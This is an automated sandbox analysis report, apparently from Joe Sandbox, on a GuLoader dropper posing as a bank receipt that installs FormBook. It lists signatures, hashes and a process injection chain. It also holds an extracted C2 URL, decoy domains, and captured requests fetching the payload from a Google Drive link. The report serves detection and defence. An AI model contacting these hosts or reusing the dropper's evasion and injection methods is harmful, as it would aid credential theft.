Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Sample Name: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Analysis ID: 540355
MD5: 72a345c95142aee60e7df54b570c2c6b
SHA1: aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256: a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
Tags: exe, Formbook, guloader, xloader

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Bank_Transfer_Receipt_Copy_Scan#342 (5).exe (PID: 4360 cmdline: "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe" MD5: 72A345C95142AEE60E7DF54B570C2C6B)
    • nongrav.exe (PID: 6136 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)
      • nongrav.exe (PID: 4520 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)
        • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 5168 cmdline: /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • rundll32.exe (PID: 1096 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x6ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x6af8:$sqlite3text: 68 38 2A 90 C5
  • 0x6c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |

        Sigma Overview

        System Summary:

        Sigma detected: Suspect Svchost Activity
        Source: Process started, Author: David Burkett, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932
        Sigma detected: Suspicious Svchost Process
        Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

        Jbx Signature Overview

        AV Detection:

        Found malware configuration
        Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
        Multi AV Scanner detection for submitted file
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Metadefender: Detection: 14%
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, ReversingLabs: Detection: 26%
        Yara detected FormBook
        Source: Yara match, File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
        Multi AV Scanner detection for domain / URL
        Source: www.thesocialmediacreator.com/i638/, Virustotal: Detection: 5%
        Machine Learning detection for sample
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Joe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe, Joe Sandbox ML: detected
        Source: 1.2.nongrav.exe.560000.1.unpack, Avira: Label: TR/Dropper.Gen
        Source: 22.2.svchost.exe.3f3796c.4.unpack, Avira: Label: TR/Dropper.Gen
        Source: 22.2.svchost.exe.3214020.1.unpack, Avira: Label: TR/Dropper.Gen
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00F32DAE
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: unknown, HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
        Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
        Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00F321E7
        Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop esi 22_2_02D35825

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: www.thesocialmediacreator.com/i638/
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global traffic, HTTP traffic detected:
          GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: drive.google.com
          Cache-Control: no-cache
        Source: global traffic, HTTP traffic detected:
          GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Cache-Control: no-cache
          Host: doc-0c-ao-docs.googleusercontent.com
          Connection: Keep-Alive
        Source: unknown, Network traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49837
        Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
        Source: unknown, DNS traffic detected: queries for: drive.google.com
        Source: unknown, HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2
        Source: nongrav.exe, 00000001.00000002.507440632.00000000006BA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        E-Banking Fraud:

        Yara detected FormBook
        Source: Yara match, File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00F31DC7
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: String function: 1EACB150 appears 35 times
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA9248 NtAllocateVirtualMemory,1_2_02AA9248
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AACBBD NtProtectVirtualMemory,1_2_02AACBBD
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_00418680 NtReadFile,15_2_00418680
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_004185D0 NtCreateFile,15_2_004185D0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_004187B0 NtAllocateVirtualMemory,15_2_004187B0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_0041867C NtCreateFile,NtReadFile,15_2_0041867C
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_00418622 NtCreateFile,15_2_00418622
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_004185CD NtCreateFile,15_2_004185CD
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_004187AA NtAllocateVirtualMemory,15_2_004187AA
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB096E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_1EB096E0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09A20 NtResumeThread,LdrInitializeThunk,15_2_1EB09A20
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09A00 NtProtectVirtualMemory,LdrInitializeThunk,15_2_1EB09A00
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09660 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_1EB09660
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09A50 NtCreateFile,LdrInitializeThunk,15_2_1EB09A50
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB097A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_1EB097A0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09780 NtMapViewOfSection,LdrInitializeThunk,15_2_1EB09780
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09FE0 NtCreateMutant,LdrInitializeThunk,15_2_1EB09FE0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09710 NtQueryInformationToken,LdrInitializeThunk,15_2_1EB09710
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB098F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_1EB098F0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09860 NtQuerySystemInformation,LdrInitializeThunk,15_2_1EB09860
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09840 NtDelayExecution,LdrInitializeThunk,15_2_1EB09840
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB099A0 NtCreateSection,LdrInitializeThunk,15_2_1EB099A0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_1EB09910
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09540 NtReadFile,LdrInitializeThunk,15_2_1EB09540
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09A80 NtOpenDirectoryObject,15_2_1EB09A80
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB096D0 NtCreateKey,15_2_1EB096D0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09A10 NtQuerySection,15_2_1EB09A10
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09610 NtEnumerateValueKey,15_2_1EB09610
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09670 NtQueryInformationProcess,15_2_1EB09670
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09650 NtQueryValueKey,15_2_1EB09650
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB0A3B0 NtGetContextThread,15_2_1EB0A3B0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09730 NtQueryVirtualMemory,15_2_1EB09730
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB0A710 NtOpenProcessToken,15_2_1EB0A710
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09B00 NtSetValueKey,15_2_1EB09B00
